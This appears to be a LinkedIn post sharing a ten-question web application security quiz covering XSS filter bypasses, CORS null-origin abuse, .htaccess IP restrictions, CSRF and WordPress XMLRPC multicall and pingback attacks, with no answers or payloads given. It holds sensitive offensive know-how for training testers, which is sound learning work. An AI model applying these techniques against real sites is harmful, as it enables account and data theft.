Brain Storming: Quiz-1(Web App)

Brain Storming: Quiz-1(Web App)

Hi,

Hope you guys are doing well. Today while going through my old mails, I came across the theoretical Web App Security Quiz which I created last year while working in my old company. Although its been more than one year, questions are still worth giving a shot. That's why I thought to share it with others.

Rules: There are no rules, that means you are free to use internet to search for answers but in the end its totally up to you to test your knowledge & skills. And try to finish the quiz within 15 minutes.

Note: Questions are scenario based and theoretical, take your time to think and then write down your answers. If you want to discuss or you have any issue, please feel free to ask.

Questions:

1) User supplied data is reflecting on a page inside the value attribute of an input tag and on that webpage HTML Entities with its default settings is being used for mitigating the XSS. Is it possible to perform XSS here. Explain your answer(i.e. why & how).

<input type='text' value='user supplied data'>

2) What is a Cookie Same Site Attribute? What is the benefit of using it in a Web Application?

3) In a web application, there is a directory named as /admin/. This directory can be accessed via only one place i.e. when user logs in from the webserver console and if user tries to access it from a different location 403 error is displayed. This particular restriction is placed by restricting access to directory by whitelisting IP of webserver console in the .htaccess file. If no other vulnerabilities like directory listing, file upload, etc. exists, is it possible for an attacker to access that directory from a different location? Explain your answer.

4) There is an application which is using Akamai Services and XSS is properly mitigated in this application by using Input Validation & Output Encoding. In addition to this "X-Originating-IP", "X-Forwarded-For", "X-Remote-IP" & "X-Remote-Addr" headers are also disabled on the server. There is a section named as - "User Log" in the application which displays the IP address of the computer which was used to access the application. Developer has left this section as he thought that there is no need of applying any XSS protection. Is it possible to exploit XSS in this section. Explain your answer.

5) Write a XSS payload when "parenthesis (), backtick ` & pseudo protocols" are blocked.

6) Is it possible to perform a "Two Way CSRF Attack"? Give a scenario to support your answer.

7) An application is having request & response headers related to CORS in the following fashion:

Request: 
Origin: null

Response: 
Access-Control-Allow-Origin: null 
Access-Control-Allow-Credentials: true

After authentication, a sensitive token is sent by the application in its response. Is it possible to steal it by exploiting the above mentioned configuration of CORS. If yes, then explain your answer.

8) What is benefit of exploiting XMLRPC with "system.multicall" method?

9) Write any attack which can be performed by exploiting "pingback.ping" method in XMLRPC.

10) If user supplied data is reflecting inside a page with "Content-Type: text/xml". How you will perform XSS in such scenarios ?

These questions are related to the scenarios which I faced while testing the applications or are taken from the blogs of other security researchers(Kudos to them, for sharing their work!). Once you are done with answering the questions, you can either send it to me for validating it or you can use Google for finding the correct answer.

Remain curious & keep learning. All the best!


Jaya Ram Kumar Pothi CISSP

Chief Executive Consultant @ Briskinfosec-IT Security, Information Security & Cyber security Consulting

6 年

If you would publish the answer in a new article, which will get you more views and it will be useful for many

要查看或添加评论,请登录

Utkarsh Tiwari的更多文章

  • Internal IP/ Host Name Disclosure In Server Redirects

    Internal IP/ Host Name Disclosure In Server Redirects

    Hi! Hope you guys are doing well. The vulnerability which I'm going to explain today is present in wild and is often…

    10 条评论
  • Brain Storming: Quiz-1(Web App) Solution

    Brain Storming: Quiz-1(Web App) Solution

    Hi, Hope everyone is doing good. It's been a while since I posted small quiz under the heading Brain Storming:…

    2 条评论
  • Exploiting Misconfigured Cross Origin Resource Sharing

    Exploiting Misconfigured Cross Origin Resource Sharing

    Hi! Hope you guys are doing well. CORS was introduced along with HTML 5.

  • It's all about fuzzing!

    It's all about fuzzing!

    Hi, Hope you guys are doing well. It's been decades since I shared anything! Moving on, recently I came across a very…

    6 条评论
  • Host Header Injection In Depth

    Host Header Injection In Depth

    Hi! Hope you guys are doing well. Today we will learn about Host header injection.

    30 条评论
  • Photography

    Photography

    Cellphone Photography "What I like about photographers,is that they capture a moment that's gone forever,impossible to…

社区洞察

其他会员也浏览了